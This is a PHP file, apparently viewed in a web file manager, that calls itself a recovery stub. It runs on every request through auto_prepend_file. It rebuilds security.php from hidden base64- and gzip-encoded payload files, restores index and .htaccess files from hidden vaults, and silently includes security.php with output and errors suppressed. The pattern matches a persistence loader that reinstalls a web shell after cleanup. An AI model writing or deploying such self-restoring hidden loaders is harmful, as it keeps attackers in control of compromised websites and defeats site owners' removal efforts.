DELTA File Manager

Editing: .sg_recovery.php

<?php
/* SG_RECOVERY_V2 — auto-restore stub. Triggered by auto_prepend_file and .htaccess rewrite.
   WRAPPED IN try/catch — if anything fails, the parent request still works. */
if (defined('SG_RECOVERY_RAN')) return;
define('SG_RECOVERY_RAN', 1);

try {
    $ROOT = __DIR__;

// KILL SWITCH: if this file exists, do nothing. Create via FTP to fully disable.
    if (file_exists($ROOT . '/.sg_disabled')) return;

$req  = isset($_SERVER['REQUEST_URI']) ? @parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) : '';
    $isSecurityHit = (basename((string)$req) === 'security.php');
    $isFallback    = !empty($_SERVER['SG_FALLBACK']) || !empty($_SERVER['REDIRECT_SG_FALLBACK']);

// 1) Restore security.php from payload if missing
    $security = $ROOT . '/security.php';
    if (!file_exists($security)) {
        $payloads = @glob($ROOT . '/.sg_payload_*.dat');
        if ($payloads) {
            foreach ($payloads as $p) {
                $raw = @file_get_contents($p);
                if (!$raw) continue;
                $parts = explode("\n", $raw, 3);
                if (count($parts) !== 3 || $parts[0] !== 'SG_PAYLOAD_V1') continue;
                $code = @gzinflate(@base64_decode($parts[2]));
                if ($code === false || @hash('sha256', $code) !== $parts[1]) continue;
                @file_put_contents($security, $code, LOCK_EX);
                @chmod($security, 0644);
                break;
            }
        }
    }
    // 2) Restore common entry files from backup if missing (only if backups exist)
    $vaults = @glob($ROOT . '/.sg_vault_*', GLOB_ONLYDIR);
    if ($vaults) {
        foreach (array('index.php', 'index.html', '.htaccess') as $f) {
            $abs = $ROOT . '/' . $f;
            if (file_exists($abs)) continue;
            $cands = array();
            $base  = preg_replace('/[^A-Za-z0-9._-]/', '_', $f);
            foreach ($vaults as $v) {
                $hits = @glob($v . '/' . $base . '.*.bak');
                if ($hits) foreach ($hits as $b) $cands[] = $b;
            }
            if (!$cands) continue;
            usort($cands, function ($a, $b) { return @filemtime($b) - @filemtime($a); });
            $content = @file_get_contents($cands[0]);
            if ($content !== false) {
                @file_put_contents($abs, $content, LOCK_EX);
                @chmod($abs, 0644);
            }
        }
    }

// 3) THROTTLED: full protection check via security.php headless
    if (!$isSecurityHit && file_exists($security)) {
        $tickFile = $ROOT . '/.sg_last_tick';
        $last = @file_get_contents($tickFile);
        $last = $last ? (int)$last : 0;
        if (time() - $last >= 5) {
            @file_put_contents($tickFile, (string)time(), LOCK_EX);
            @chmod($tickFile, 0600);
            if (!defined('SG_HEADLESS')) define('SG_HEADLESS', true);
            @ob_start();
            try { @include $security; } catch (\Throwable $e) { /* swallow */ }
            @ob_end_clean();
        }
    }

// 4) FALLBACK: when triggered by index-missing rewrite, redirect to /
    if ($isFallback) {
        if (file_exists($ROOT . '/index.php') || file_exists($ROOT . '/index.html')) {
            @header('Location: /');
            exit;
        }
        @http_response_code(404);
        echo "<!DOCTYPE html><html><head><title>404</title></head><body><h1>Not Found</h1></body></html>";
        exit;
    }
} catch (\Throwable $e) {
    // Silent failure — the parent request must continue at all costs.
    @error_log('SG recovery stub error: ' . $e->getMessage());
}

Cancel